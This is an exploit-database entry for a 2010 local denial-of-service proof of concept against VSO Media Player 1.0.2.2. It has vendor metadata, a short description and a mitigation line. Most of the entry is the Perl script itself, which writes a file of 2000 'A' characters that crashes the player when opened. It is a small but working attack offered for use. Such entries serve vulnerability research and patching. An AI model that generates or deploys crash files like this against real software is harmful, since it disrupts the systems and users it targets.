header-logo
Suggest Exploit
vendor:
VSO Media Player
by:
SarBoT511
7,8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: VSO Media Player
Affected Version From: 1.0.2.2
Affected Version To: 1.0.2.2
Patch Exists: YES
Related CWE: N/A
CPE: a:vso-software:vso_media_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
2010

VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc

This exploit creates a file named SarBoT511.ape with 2000 'A' characters, which causes a denial of service when the file is opened in VSO Media Player version 1.0.2.2.

Mitigation:

Update to the latest version of VSO Media Player.
Source

Exploit-DB raw data:

#!usr/bin/perl
#Exploits title :[VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc]
#Date : [2010/01/02]
#Aouther : [SarBoT511]
#downloads :[www.vso-software.fr]
#tested on :[win xp sp2]
#VSO Medoa Player Version 1.0.2.2


$file="SarBoT511.ape";
$boom="A" x 2000;
open(myfile,">>$file");
print myfile $boom;
close(myfile);
print "Done ..! ~#";